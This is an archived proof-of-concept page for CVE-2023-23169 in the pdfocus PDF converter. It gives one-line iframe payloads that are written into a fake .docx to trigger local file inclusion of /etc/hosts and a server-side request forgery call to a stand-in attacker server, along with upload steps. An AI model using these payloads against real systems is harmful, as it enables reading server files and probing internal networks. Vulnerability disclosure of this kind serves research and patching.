CVE-2023-23169 PoC — pdfocus 代码问题漏洞

Source

https://github.com/S4nshine/CVE-2023-23169

Associated Vulnerability

Title:pdfocus 代码问题漏洞 (CVE-2023-23169)
Description:pdfocus是简单安全的 PDF 转换。 Synapsoft pdfocus 1.17版本存在安全漏洞，该漏洞源于系统容易受到本地文件包含、服务器端请求伪造和目录遍历的影响。

Readme

# CVE-2023-23169


POC for CVE-2023-23169 Local File inclusion & Server side request Forgery

## Steps to reproduce :
**Local File Incusion :**
1. ```echo "<iframe src=file://etc/hosts></iframe>" > poc.docx```
2. Upload the file in PDFocus services 
3. View/Download file after to triggered POC 


**SSRF** : 
1. ```echo "<iframe src=http://your-server></iframe>" > poc.docx```
2. Upload the file in PDFocus services 
3. View/Download file to see  triggered POC 

## Demo : 
![Screenshot 2023-05-01 at 4 20 28 PM](https://user-images.githubusercontent.com/11758455/235442743-e8974e79-5d18-4da1-be28-00812d5e7d38.png)

![demo2](https://user-images.githubusercontent.com/11758455/235441374-07741812-5993-441a-9a6f-697d86b022aa.png)
![demo4](https://user-images.githubusercontent.com/11758455/235441365-93b6ca9d-363e-4bbe-8ec5-31b849bdb2bc.png)


![demo3](https://user-images.githubusercontent.com/11758455/235441393-67758da1-5ba4-41c4-b844-18950bc56d76.png)

File Snapshot


 [4.0K]  /data/pocs/42650bb7056b237b5ff7824a9db0fda815eaa56d
└── [ 956]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!